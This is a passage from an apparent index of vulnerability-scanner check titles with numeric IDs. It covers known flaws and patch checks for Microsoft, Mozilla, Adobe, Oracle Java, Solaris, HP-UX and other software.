SE Code Execution Vulnerabilities (Windows) [902351] Microsoft Groove Remote Code Execution Vulnerability (2494047) [902350] Oracle Java SE Code Execution Vulnerability (Windows-01) [902349] Oracle Java SE Code Execution Vulnerability (Windows) [902347] Oracle Java SE Multiple Unspecified Vulnerabilities (Windows) [902344] Oracle Java SE Multiple Unspecified Vulnerabilities (Windows) [902341] VLC Media Player USF and Text Subtitles Decoders BOF Vulnerabilities (Windows) [902340] VLC Media Player '.mkv' Code Execution Vulnerability (Windows) [902336] Microsoft JScript and VBScript Scripting Engines Information Disclosure Vulnerability (2475792) [902334] Vulnerability in Windows Shell Graphics Processing Could Allow Remote Code Execution (2483185) [902333] Tor Unspecified Heap Based Buffer Overflow Vulnerability (Windows) [902325] Microsoft Internet Explorer 'CSS Import Rule' Use-after-free Vulnerability [902324] Microsoft SharePoint Could Allow Remote Code Execution Vulnerability (2455005) [902323] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (981957) [902322] Windows Local Procedure Call Privilege Elevation Vulnerability (2360937) [902319] Microsoft Foundation Classes Could Allow Remote Code Execution Vulnerability (2387149) [902306] Mozilla Products 'js_InitRandom' Information Disclosure Vulnerability (Windows) [902305] Mozilla Firefox Information Disclosure Vulnerability (Windows) [902303] Adobe Products Content Code Execution Vulnerability (Windows) [902301] Windows Client/Server Runtime Subsystem Privilege Elevation Vulnerability (2121546) [902293] Metasploit Framework Version Detection (Windows) [902288] Microsoft Kerberos Privilege Escalation Vulnerabilities (2496930) [902287] Microsoft Visio Remote Code Execution Vulnerabilities (2451879) [902285] Microsoft Internet Explorer Information Disclosure Vulnerability (2501696) [902278] MS Windows ICSW Remote Code Execution Vulnerability (2443105) [902275] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2436673) [902274] Microsoft Publisher Remote Code Execution Vulnerability (2292970) [902265] Microsoft Office Word Remote Code Execution Vulnerabilities (2293194) [902264] Microsoft Office Excel Remote Code Execution Vulnerabilities (2293211) [902255] Microsoft Visual Studio Insecure Library Loading Vulnerability [902254] Microsoft Office Products Insecure Library Loading Vulnerability [902250] Microsoft Word 2003 'MSO.dll' Null Pointer Dereference Vulnerability [902246] Microsoft Internet Explorer 'toStaticHTML()' Cross Site Scripting Vulnerability [902243] Microsoft Outlook TNEF Remote Code Execution Vulnerability (2315011) [902242] Mozilla Products Insecure Library Loading Vulnerability (Windows) [902239] Wireshark File Opening Insecure Library Loading Vulnerability (Windows) [902238] Skype Insecure Library Loading Vulnerability (Windows) [902230] Microsoft .NET Common Language Runtime Remote Code Execution Vulnerability (2265906) [902229] Microsoft Window MPEG Layer-3 Remote Code Execution Vulnerability (2115168) [902228] Microsoft Office Word Remote Code Execution Vulnerabilities (2269638) [902217] Microsoft Outlook SMB Attachment Remote Code Execution Vulnerability (978212) [902210] Microsoft IE cross-domain IFRAME gadgets keystrokes steal Vulnerability [902204] Mozilla Products Multiple Vulnerabilities june-10 (Windows) [902203] Opera Browser Multiple Vulnerabilities (Windows) [902197] Wireshark SMB PIPE Dissector Denial of Service Vulnerability (Windows) [902196] Wireshark SMB dissector Denial of Service Vulnerability (Windows) [902195] Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows) [902193] Microsoft .NET Framework XML HMAC Truncation Vulnerability (981343) [902192] Microsoft Office COM Validation Remote Code Execution Vulnerability (983235) [902191] Microsoft Internet Explorer Multiple Vulnerabilities (982381) [902186] Mozilla Firefox Multiple Denial Of Service vulnerabilities (Windows) [902185] Mozilla Products 'IFRAME' Denial Of Service vulnerability (Windows) [902183] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability [902182] Opera Browser Multiple Denial Of Service Vulnerability (Windows) [902178] Microsoft Visual Basic Remote Code Execution Vulnerability (978213) [902176] Microsoft SharePoint '_layouts/help.aspx' Cross Site Scripting Vulnerability [902167] Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows) [902166] Microsoft Internet Explorer 'neutering' Mechanism XSS Vulnerability [902161] Adobe Acrobat and Reader PDF Handling Multiple Vulnerabilities (Windows) [902159] Microsoft VBScript Scripting Engine Remote Code Execution Vulnerability (980232) [902158] Microsoft Office Publisher Remote Code Execution Vulnerability (981160) [902157] Microsoft 'ISATAP' Component Spoofing Vulnerability (978338) [902156] Microsoft SMB Client Remote Code Execution Vulnerabilities (980232) [902155] Microsoft Internet Explorer Multiple Vulnerabilities (980182) [902151] Microsoft Internet Explorer Denial of Service Vulnerability - Mar10 [902149] Mozilla Products Multiple Vulnerabilities Mar-10 (Windows) [902147] Mozilla Firefox Unspecified Vulnerability Mar-10 (Windows) [902133] Microsoft Office Excel Multiple Vulnerabilities (980150) [902130] Mozilla Products Multiple Vulnerabilities feb-10 (Windows) [902128] Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Windows) [902120] Google Chrome Multiple Vulnerabilities - (Windows) [902117] Microsoft DirectShow Remote Code Execution Vulnerability (977935) [902116] Microsoft Client/Server Run-time Subsystem Privilege Elevation Vulnerability (978037) [902115] Microsoft Kerberos Denial of Service Vulnerability (977290) [902114] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (975416) [902112] Microsoft SMB Client Remote Code Execution Vulnerabilities (978251) [902098] Novell iPrint Client Multiple Vulnerabilities (windows) [902095] Microsoft Office Excel Remote Code Execution Vulnerability (2269707) [902080] Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593) [902075] XnView 'MBM' Processing Buffer Overflow Vulnerability (Windows) [902073] Google Chrome 'WebKit' Multiple Vulnerabilities (Windows) - June 10 [902069] Microsoft SharePoint Privilege Elevation Vulnerabilities (2028554) [902068] Microsoft Office Excel Remote Code Execution Vulnerabilities (2027452) [902060] Cybozu Office Authentication Bypass Vulnerability (Windows) [902045] aMSN session hijack vulnerability (Windows) [902044] aMSN Version Detection (Windows) [902039] Microsoft Visio Remote Code Execution Vulnerabilities (980094) [902038] Microsoft MPEG Layer-3 Codecs Remote Code Execution Vulnerability (977816) [902027] Mozilla Firefox Unspecified Vulnerability (Windows) [902015] Microsoft Paint Remote Code Execution Vulnerability (978706) [901210] Microsoft Office Privilege Elevation Vulnerability - 2721015 (Mac OS X) [901208] Microsoft Internet Explorer Multiple Vulnerabilities (2586448) [901206] Check RPC rstatd Service Running [901197] Google Chrome multiple vulnerabilities - March 11 (Windows) [901190] Google Chrome Use-After-Free Vulnerability (Windows) [901182] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2479628) [901181] Windows Client/Server Run-time Subsystem Privilege Elevation Vulnerability (2476687) [901180] Microsoft Internet Explorer Multiple Vulnerabilities (2482017) [901174] OpenSC Version Detection (Windows) [901173] Windows Backup Manager Remote Code Execution Vulnerability (2478935) [901166] Microsoft Office Remote Code Execution Vulnerabilites (2423930) [901165] Windows Common Control Library Remote Code Execution Vulnerability (2296011) [901162] Microsoft Internet Explorer Multiple Vulnerabilities (2360131) [901161] Microsoft ASP.NET Information Disclosure Vulnerability (2418042) [901153] Google Chrome multiple vulnerabilities Sep-10 (Windows) [901151] Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960) [901145] FreeType Unspecified Vulnerability (Windows) [901144] FreeType Version Detection (Windows) [901143] FreeType Memory Corruption and Buffer Overflow Vulnerabilities (Windows) [901142] FreeType Multiple denial of service vulnerabilities (Windows) [901139] Microsoft Internet Explorer Multiple Vulnerabilities (2183461) [901120] Microsoft IIS Authentication Remote Code Execution Vulnerability (982666) [901097] Microsoft Internet Explorer Multiple Vulnerabilities (978207) [901095] Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (972270) [901082] IBM DB2 UDB Multiple Unspecified Vulnerabilities (Windows) [901069] Microsoft Office Project Remote Code Execution Vulnerability (967183) [901047] MS Windows License Logging Server Remote Code Execution Vulnerability (974783) [901041] Microsoft Internet Explorer Multiple Code Execution Vulnerabilities (974455) [901039] Vulnerabilities in Windows Media Runtime Could Allow Remote Code Execution (975682) [900973] Microsoft Office Word Remote Code Execution Vulnerability (976307) [900964] Microsoft .NET Common Language Runtime Code Execution Vulnerability (974378) [900944] Microsoft IIS FTP Server 'ls' Command DOS Vulnerability [900929] Microsoft JScript Scripting Engine Remote Code Execution Vulnerability (971961) [900898] Microsoft Internet Explorer 'XSS Filter' XSS Vulnerabilities - Nov09 [900897] Microsoft Internet Explorer PDF Information Disclosure Vulnerability - Nov09 [900891] Microsoft Internet Denial Of Service Vulnerability - Nov09 [900887] Microsoft Office Excel Multiple Vulnerabilities (972652) [900878] Microsoft Products GDI Plus Code Execution Vulnerabilities (957488) [900874] Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254) [900863] Microsoft Internet Explorer 'window.print()' DOS Vulnerability [900837] Microsoft DHTML Editing Component ActiveX Remote Code Execution Vulnerability (956844) [900836] Microsoft Internet Explorer Address Bar Spoofing Vulnerability [900826] Microsoft Internet Explorer 'location.hash' DOS Vulnerability [900813] Microsoft Remote Desktop Connection Remote Code Execution Vulnerability (969706) [900809] Microsoft Visual Studio ATL Remote Code Execution Vulnerability (969706) [900808] Microsoft Visual Products Version Detection [900799] Ruby Interpreter Version Detection (Windows) [900752] XnView DICOM Parsing Integer Overflow Vulnerability (Windows) [900741] Microsoft Internet Explorer Information Disclosure Vulnerability Feb10 [900725] Ruby Interpreter Heap Overflow Vulnerability (Windows) - Dec09 [900724] Windows XP 'SPI_GETDESKWALLPAPER' DoS Vulnerability [900711] Microsoft IIS WebDAV Remote Authentication Bypass Vulnerability [900690] Microsoft Virtual PC/Server Privilege Escalation Vulnerability (969856) [900689] Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (961371)) [900670] Microsoft Office Excel Remote Code Execution Vulnerabilities (969462) [900669] Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537) [900668] Vulnerability in RPC Could Allow Elevation of Privilege (970238) [900602] RPC portmapper [900589] Microsoft ISA Server Privilege Escalation Vulnerability (970953) [900588] Microsoft DirectShow Remote Code Execution Vulnerability (961373) [900567] Microsoft IIS Security Bypass Vulnerability (970483) [900566] Microsoft Active Directory LDAP Remote Code Execution Vulnerability (969805) [900479] PostgreSQL Version Detection (Windows) [900476] Microsoft Excel Remote Code Execution Vulnerabilities (968557) [900461] Microsoft MSN Live Messneger Denial of Service Vulnerability [900445] Microsoft Autorun Arbitrary Code Execution Vulnerability (08-038) [900400] Microsoft Internet Explorer Unicode String DoS Vulnerability [900391] Microsoft Office Publisher Remote Code Execution Vulnerability (969516) [900366] Microsoft Internet Explorer Web Script Execution Vulnerabilites [900365] Microsoft Office Word Remote Code Execution Vulnerabilities (969514) [900337] Microsoft Internet Explorer Denial of Service Vulnerability - Apr09 [900328] Microsoft Internet Explorer Remote Code Execution Vulnerability (963027) [900322] Tor Replay Attack Vulnerability (Windows) [900314] Microsoft XML Core Service Information Disclosure Vulnerability [900303] Microsoft Internet Explorer HTML Form Value DoS Vulnerability [900302] MS Windows taskmgr.exe Information Disclosure Vulnerability [900299] Microsoft Report Viewer Information Disclosure Vulnerability (2578230) [900298] MS Windows Remote Access Service NDISTAPI Driver Privilege Elevation Vulnerability (2566454) [900294] Microsoft Data Access Components Remote Code Execution Vulnerabilities (2560656) [900288] Microsoft Distributed File System Remote Code Execution Vulnerabilities (2535512) [900287] Microsoft SMB Client Remote Code Execution Vulnerabilities (2536276) [900285] Microsoft Foundation Class (MFC) Library Remote Code Execution Vulnerability (2500212) [900283] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2506223) [900282] Microsoft DNS Resolution Remote Code Execution Vulnerability (2509553) [900279] Microsoft SMB Client Remote Code Execution Vulnerabilities (2511455) [900278] Microsoft Internet Explorer Multiple Vulnerabilities (2497640) [900273] Microsoft Remote Desktop Client Remote Code Execution Vulnerability (2508062) [900267] Microsoft Media Decompression Remote Code Execution Vulnerability (2447961) [900262] Microsoft Internet Explorer Multiple Vulnerabilities (2416400) [900261] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2293386) [900246] Microsoft Media Decompression Remote Code Execution Vulnerability (979902) [900245] Microsoft Data Analyzer and IE Developer Tools ActiveX Control Vulnerability (980195) [900229] Microsoft Data Analyzer ActiveX Control Vulnerability (978262) [900228] Microsoft Office (MSO) Remote Code Execution Vulnerability (978214) [900223] Microsoft Ancillary Function Driver Elevation of Privilege Vulnerability (956803) [900218] IBM DB2 Server Detection (Windows) [900192] Microsoft Internet Explorer Information Disclosure Vulnerability [900187] Microsoft Internet Explorer Argument Injection Vulnerability [900170] Microsoft iExplorer '&NBSP [900131] Microsoft Internet Explorer Denial of Service Vulnerability [900128] CuteNews Version Detection for Windows [900125] Microsoft SQL Server 2000 sqlvdir.dll ActiveX Buffer Overflow Vulnerability [900123] Apple iTunes Version Detection for Windows [900120] Microsoft Organization Chart Remote Code Execution Vulnerability [900097] Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution [900095] Microsoft ISA Server and Forefront Threat Management Gateway DoS Vulnerability (961759) [900094] Vulnerabilities in Windows Could Allow Elevation of Privilege (959454) [900093] Microsoft DirectShow Remote Code Execution Vulnerability (961373) [900092] Windows HTTP Services Could Allow Remote Code Execution Vulnerabilities (960803) [900086] Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690) [900080] Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution (957634) [900079] Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (959239) [900064] Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175) [900063] Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173) [900061] Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070) [900060] Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807) [900058] Microsoft XML Core Services Remote Code Execution Vulnerability (955218) [900052] Windows Internet Printing Service Allow Remote Code Execution Vulnerability (953155) [900051] Windows Kernel Elevation of Privilege Vulnerability (954211) [900049] Host Integration Server RPC Service Remote Code Execution Vulnerability (956695) [900048] Microsoft Excel Remote Code Execution Vulnerability (956416) [900047] Microsoft Office nformation Disclosure Vulnerability (957699) [900046] Microsoft Office Remote Code Execution Vulnerabilities (955047) [900045] Windows Media Player 11 Remote Code Execution Vulnerability (954154) [900044] Windows Media Encoder 9 Remote Code Execution Vulnerability (954156) [900036] Opera Version Detection for Windows [900034] Windows Messenger Could Allow Information Disclosure Vulnerability (955702) [900033] Microsoft PowerPoint Could Allow Remote Code Execution Vulnerabilities (949785) [900029] Microsoft Office Filters Could Allow Remote Code Execution Vulnerabilities (924090) [900028] Microsoft Excel Could Allow Remote Code Execution Vulnerabilities (954066) [900025] Microsoft Office Version Detection [900012] Enumerates List of Windows Hotfixes [900006] Microsoft Word Could Allow Remote Code Execution Vulnerability [900004] Microsoft Access Snapshot Viewer ActiveX Control Vulnerability [900003] Apple Safari Detect Script (Windows) [900002] Apple Safari for Windows Multiple Vulnerabilities July-08 [900001] Opera for Windows Unspecified Code Execution Vulnerabilities July-08 [860852] Fedora Update for libtirpc FEDORA-2008-1017 [860389] Fedora Update for libtirpc FEDORA-2008-9204 [855770] Solaris Update for rpc.nisd 140917-02 [855741] Solaris Update for rpc.nisd 140918-02 [855685] Solaris Update for rpc.nisd 140917-01 [855672] Solaris Update for rpc.nisd 140918-01 [855563] Solaris Update for /usr/lib/netsvc/rwall/rpc.rwalld 112847-01 [855554] Solaris Update for librpcsvc 127549-01 [855522] Solaris Update for librpcsvc 127548-01 [855518] Solaris Update for rpc.ypupdated 139986-01 [855515] Solaris Update for usr/sbin/rpc.metad 139967-01 [855503] Solaris Update for rpcsec_gss 126929-02 [855466] Solaris Update for OpenWindows 3.6.1 108117-06 [855441] Solaris Update for ypserv/ypxfrd/rpc.yppasswdd 114342-12 [855436] Solaris Update for rpc.ypupdated 138886-01 [855419] Solaris Update for librpcsvc 123397-01 [855408] Solaris Update for rpc.ypupdated 138575-01 [855393] Solaris Update for OpenWindows 3.6.2 111626-04 [855385] Solaris Update for rpc.ypupdated 140102-01 [855364] Solaris Update for librpcsvc 123396-01 [855334] Solaris Update for OpenWindows 3.6.2 113792-01 [855317] Solaris Update for /usr/lib/netsvc/rwall/rpc.rwalld 112875-01 [855246] Solaris Update for OpenWindows 3.7.3 119903-02 [855227] Solaris Update for /usr/lib/netsvc/rwall/rpc.rwalld 112846-01 [855223] Solaris Update for usr/sbin/rpc.metad 138574-01 [855208] Solaris Update for rpc.ypupdated 138576-01 [855196] Solaris Update for NFS Daemon, rpcmod 113278-22 [855173] Solaris Update for OpenWindows 3.7.0 112811-02 [855158] Solaris Update for rpcsec_gss 126928-02 [855128] Solaris Update for rpc.ypupdated 138885-01 [855124] Solaris Update for nfs and rpcmod 116960-21 [855123] Solaris Update for nfs and rpcmod 116959-21 [855098] Solaris Update for NFS Daemon, rpcmod 119439-15 [855057] Solaris Update for OpenWindows 3.6.2 110286-16 [855014] Solaris Update for usr/sbin/rpc.metad 140106-01 [841137] Ubuntu Update for xmlrpc-c USN-1527-2 [840391] Ubuntu Update for xmlrpc-c vulnerabilities USN-890-5 [840163] Ubuntu Update for krb5, librpcsecgss vulnerability USN-511-2 [840047] Ubuntu Update for krb5, librpcsecgss vulnerability USN-511-1 [835182] HP-UX Update for rpcbind HPSBUX02370 [835143] HP-UX Update for rpc.yppasswdd HPSBUX00242 [835134] HP-UX Update for rpcbind Software HPSBUX00169 [835116] HP-UX Update for rpc.ypupdated HPSBUX01002 [835113] HP-UX Update for rpc.mountd HPSBUX00272 [835102] HP-UX Update for rpc.yppasswdd HPSBUX02295 [835100] HP-UX Update for rpc.ttdbserverd HPSBUX00168 [835057] HP-UX Update for RPC HPSBUX00252 [835039] HP-UX Update for RPC HPSBUX01020 [835012] HP-UX Update for rpc.ttdbserver HPSBUX00199 [830306] Mandriva Update for librpcsecgss MDKSA-2007:181 (librpcsecgss) [803479] Adobe Acrobat Multiple Vulnerabilities - Windows [803456] Adobe Air Multiple Vulnerabilities - December12 (Windows) [803454] Adobe Air Multiple Vulnerabilities - November12 (Windows) [803451] Adobe Air Multiple Vulnerabilities - October 12 (Windows) [803354] Mozilla Thunderbird Multiple Vulnerabilities-02 November12 (Windows) [803353] Mozilla SeaMonkey Multiple Vulnerabilities-02 November12 (Windows) [803352] Mozilla Thunderbird ESR Multiple Vulnerabilities-01 November12 (Windows) [803351] Mozilla Thunderbird Multiple Vulnerabilities-01 November12 (Windows) [803350] Mozilla SeaMonkey Multiple Vulnerabilities-01 November12 (Windows) [803349] Mozilla Firefox ESR Multiple Vulnerabilities-01 November12 (Windows) [803347] Mozilla Firefox ESR Code Execution Vulnerabilities - November12 (Windows) [803336] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 03) [803335] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 02) [803334] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 01) [803127] Google Chrome Multiple Vulnerabilities-03 Dec2012 (Windows) [803121] Google Chrome Multiple Vulnerabilities-02 Dec2012 (Windows) [803118] Google Chrome Multiple Vulnerabilities-01 Dec2012 (Windows) [803103] Oracle VM VirtualBox Unspecified Denial of Service Vulnerability (Windows) [803102] Pidgin MXit Message Parsing Buffer Overflow Vulnerability (Windows) [803086] LibreOffice XML Manifest Handling Buffer Overflow Vulnerabilities (Windows) [803084] LibreOffice Graphic Object Loading Buffer Overflow Vulnerability (Windows) [803083] OpenOffice Multiple Buffer Overflow Vulnerabilities - Dec12 (Windows) [803081] Adobe Photoshop Camera Raw Plug-in Code Execution Vulnerabilities (Windows) [803074] Adobe Flash Player Multiple Vulnerabilities - December12 (Windows) [803070] Wireshark Multiple Dissector Multiple Vulnerabilities - Dec12 (Windows) [803068] Wireshark Multiple Dissector Multiple DoS Vulnerabilities - Dec12 (Windows) [803064] LibreOffice Import Files Denial of Service Vulnerabilities (Windows) [803061] Mozilla Firefox Code Execution Vulnerabilities - November12 (Windows) [803059] Mozilla Firefox Multiple Vulnerabilities - November12 (Windows) [803057] Mozilla Firefox Multiple Vulnerabilities-02 November12 (Windows) [803055] Mozilla Firefox Multiple Vulnerabilities-01 November12 (Windows) [803047] Apple QuickTime Multiple Vulnerabilities - Nov12 (Windows) [803044] Adobe Flash Player Multiple Vulnerabilities - November12 (Windows) [803043] RealPlayer Watch Folders Function Buffer Overflow Vulnerability (Windows) [803040] Mozilla Firefox Multiple Vulnerabilities - November12 (Windows) [803038] Google SketchUp '.SKP' File Memory Corruption Vulnerability (Windows) [803028] Microsoft Internet Explorer Remote Code Execution Vulnerability (2757760) [803025] Adobe Photoshop PNG Image Processing Buffer Overflow Vulnerabilities (Windows) [803021] Oracle Java SE JRE AWT Component Unspecified Vulnerability - (Windows) [803020] Oracle Java SE JRE Multiple Remote Code Execution Vulnerabilities - (Windows) [803017] Mozilla Firefox Multiple Vulnerabilities - August12 (Windows) [803015] Mozilla Firefox Multiple Vulnerabilities - August12 (Windows) [803013] Mozilla Products Memory Corruption Vulnerabilities - August12 (Windows) [803011] Mozilla Products Multiple Vulnerabilities - August12 (Windows) [803001] Opera Multiple Vulnerabilities - August12 (Windows) [802996] Mozilla Firefox 'WebSockets' Denial of Service Vulnerability (Windows) [802994] Mozilla Firefox Multiple Vulnerabilities-01 (Windows) [802991] Mozilla Firefox Security Bypass Vulnerabilities - Oct 12 (Windows) [802989] Mozilla Firefox Multiple Vulnerabilities - Oct 12 (Windows) [802986] Adobe Flash Player Multiple Vulnerabilities - October 12 (Windows) [802985] VERITAS Backup Exec Remote Agent Windows Servers BOF Vulnerability [802978] Wireshark LDP PPP and HSRP dissector Multiple Vulnerabilities (Windows) [802975] Google Chrome Windows Kernel Memory Corruption Vulnerability [802972] Google Chrome Multiple Vulnerabilities - Sep12 (Windows-01) [802962] Apple iTunes Multiple Vulnerabilities - Sep 12 (Windows) [802960] Adobe LiveCycle Designer Untrusted Search Path Vulnerability (Windows) [802954] Adobe Reader Multiple Unspecified Vulnerabilities - Windows [802952] Adobe Flash Player Multiple Vulnerabilities -01 August 12 (Windows) [802951] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities(02) - (Windows) [802950] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - (Windows) [802949] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities(01) - (Windows) [802948] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities - (Windows) [802947] Oracle Java SE Java Runtime Environment Code Execution Vulnerability - (Windows) [802945] Wireshark Multiple Vulnerabilities(01) - August 2012 (Windows) [802944] Wireshark Multiple Vulnerabilities - August 2012 (Windows) [802943] Wireshark GSM RLC MAC dissector Buffer Overflow Vulnerability (Windows) [802940] Adobe Flash Player Font Parsing Code Execution Vulnerability - (Windows) [802938] Adobe Shockwave Player Multiple Vulnerabilities - August 2012 (Windows) [802936] Adobe Reader Multiple Vulnerabilities - Windows [802935] Pidgin 'Libpurple' Cipher API Information Disclosure Vulnerability (Windows) [802932] Google Chrome PDF Viewer Multiple Vulnerabilities (Windows) [802928] Google Chrome Multiple Vulnerabilities - August 12 (Windows) [802925] Apple Safari Multiple Vulnerabilities - Aug 2012 (Windows) [802922] VLC Media Player OGG Demuxer Buffer Overflow Vulnerability (Windows) [802920] VLC Media Player 'MP4' Denial of Service Vulnerability (Windows) [802917] Google Chrome Multiple Vulnerabilities(01) - July 12 (Windows) [802912] Microsoft Unauthorized Digital Certificates Spoofing Vulnerability (2728973) [802907] Wireshark Multiple Denial of Service Vulnerabilities - July 12 (Windows) [802906] Pidgin MSN and XMPP Denial of Service Vulnerabilities (Windows) [802898] Wireshark PPP And NFS Dissector Denial of Service Vulnerabilities (Windows) [802895] Mozilla Products Memory Corruption Vulnerabilities - July12 (Windows) [802893] Mozilla Products Certificate Page Clickjacking Vulnerability (Windows) [802891] Mozilla Firefox Multiple Vulnerabilities - July12 (Windows) [802889] Mozilla Products Multiple Vulnerabilities - July12 (Windows) [802886] Microsoft Sidebar and Gadgets Remote Code Execution Vulnerability (2719662) [802880] Google Chrome Multiple Vulnerabilities - July 12 (Windows) [802871] Adobe Flash Player Multiple Vulnerabilities June-2012 (Windows) [802869] Mozilla Products 'jsinfer.cpp' Denial of Service Vulnerability (Windows) [802865] Mozilla Products Multiple Vulnerabilities - June12 (Windows) [802864] Microsoft XML Core Services Remote Code Execution Vulnerability (2719615) [802848] Google Chrome Multiple Denial of Service Vulnerabilities - May 12 (Windows) [802842] Mozilla Products Security Bypass Vulnerability - May12 (Windows) [802840] Mozilla Products Multiple Vulnerabilities - May12 (Windows) [802835] Google Chrome Multiple Vulnerabilities-02 - April 12 (Windows) [802831] EMC NetWorker 'nsrexecd' RPC Packet Denial of Service Vulnerability [802820] Mozilla Products Multiple Vulnerabilities - Mar12 (Windows) [802811] Adobe Flash Player Multiple Vulnerabilities (Windows) - Mar12 [802807] Google Chrome Multiple Denial of Service Vulnerabilities - March12 (Windows) [802806] Microsoft IIS Default Welcome Page Information Disclosure Vulnerability [802803] Adobe Flash Player Multiple Vulnerabilities (Windows) - Feb12 [802796] Apple Safari Webkit Multiple Vulnerabilities - May 12 (Windows) [802795] Apple QuickTime Multiple Vulnerabilities - (Windows) [802792] Google Chrome Multiple Vulnerabilities - May 12 (Windows) [802790] Adobe Illustrator Multiple Unspecified Vulnerabilities (Windows) [802782] Adobe Photoshop BOF and Use After Free Vulnerabilities (Windows) [802781] Adobe Flash Professional JPG Object Processing BOF Vulnerability (Windows) [802779] Adobe Shockwave Player Multiple Code Execution and DoS Vulnerabilities (Windows) [802774] Microsoft VPN ActiveX Control Remote Code Execution Vulnerability (2695962) [802772] Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Windows) [802761] Wireshark Multiple Vulnerabilities - April 12 (Windows) [802760] Wireshark IEEE 802.11 Dissector Denial of Service Vulnerability (Windows) [802759] Wireshark Multiple Denial of Service Vulnerabilities - April 12 (Windows) [802748] Adobe Reader Multiple Vulnerabilities April-2012 (Windows) [802732] Google Chrome Multiple Vulnerabilities - April 12 (Windows) [802726] Microsoft SMB Signing Disabled [802722] VLC Media Player Multiple Vulnerabilities - Mar 12 (Windows) [802717] Google Chrome 'History navigation' Arbitrary Code Execution Vulnerability (Windows) [802714] Google Chrome 'GPU process' Multiple Vulnerabilities (Windows) [802713] Pidgin Multiple Denial of Service Vulnerabilities (Windows) [802708] Microsoft Internet Explorer Code Execution and DoS Vulnerabilities [802700] Google Chrome 'HTTP session' Information Disclosure Vulnerability (Windows) [802684] IBM Director CIM Server CIMListener Directory Traversal Vulnerability (Windows) [802681] Oracle Java SE Hash Collision DoS Vulnerability (Windows) [802680] Oracle Java SE 'MurmurHash' Algorithm Hash Collision DoS Vulnerability (Windows) [802670] PHP pdo_sql_parser.re 'PDO' extension DoS vulnerability (Windows) [802652] Opera URL Processing Arbitrary Code Execution Vulnerability (Windows) [802649] Opera Multiple Denial of Service Vulnerabilities - June12 (Windows) [802646] Opera Multiple Vulnerabilities - June12 (Windows) [802612] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 03) [802611] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 02) [802610] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 01) [802600] IBM SPSS SamplePower 'VsVIEW6' ActiveX Control Multiple Code Execution Vulnerabilities (Windows) [802597] Google Chrome Multiple Vulnerabilities - February 12 (Windows 01) [802594] Google Chrome Multiple Vulnerabilities - February 12 (Windows) [802592] Mozilla Products XBL Binding Memory Corruption Vulnerability - (Windows) [802591] PHP 'magic_quotes_gpc' Directive Security Bypass Vulnerability (Windows) [802590] PHP 'php_register_variable_ex()' Remote Code Execution Vulnerability (Windows) [802581] Mozilla Products Multiple Unspecified Vulnerabilities - Feb12 (Windows 01) [802580] Mozilla Products Multiple Unspecified Vulnerabilities - Feb12 (Windows) [802579] Mozilla Products IPv6 Literal Syntax Cross Domain Information Disclosure Vulnerability (Windows) [802566] PHP Multiple Denial of Service Vulnerabilities (Windows) [802562] Strawberry Perl Modules Multiple Vulnerabilities (Windows) [802558] Adobe Reader/Acrobat Multiple Memory Corruption Vulnerabilities - Windows [802557] LibreOffice 'DOC' File Denial of Service Vulnerability (Windows) [802547] Mozilla Firefox Cache Objects History Enumeration Weakness Vulnerability (Windows) [802545] Mozilla Products Multiple Information Disclosure Vulnerabilities - (Windows) [802542] Adobe Reader/Acrobat 'U3D' Component Memory Corruption Vulnerability - Windows [802540] Adobe Flash Player 'SWF' File Multiple Code Execution Vulnerability - Windows [802518] Mozilla Products XSS and Memory Corruption Vulnerabilities (Windows) [802517] Mozilla Products Privilege Escalation Vulnerabily (Windows) [802511] Mozilla Products Multiple Vulnerabilities (Windows) [802510] Mozilla Products Browser Engine Denial of Service Vulnerabilities (Windows) [802509] Mozilla Products 'NoWaiverWrapper' Privilege Escalation Vulnerability (Windows) [802508] Adobe Shockwave Player Multiple Vulnerabilities (Windows) - Nov 2011 [802505] FFFTP Untrusted Search Path Vulnerability (Windows) [802504] PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows) [802503] Wireshark CSN.1 Dissector Denial of Service Vulnerability (Windows) [802502] Wireshark Heap Based BOF and Denial of Service Vulnerabilities (Windows) [802499] Apple Safari Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802496] Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802490] Google Chrome Multiple Vulnerabilities - Nov2012 (Windows) [802488] VLC Media Player 'libpng_plugin' Denial of Service Vulnerability (Windows) [802485] Adobe Shockwave Player Multiple Vulnerabilities Nov-2012 (Windows) [802482] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-04 oct12 (Windows) [802481] Oracle Java SE JRE Multiple Unspecified 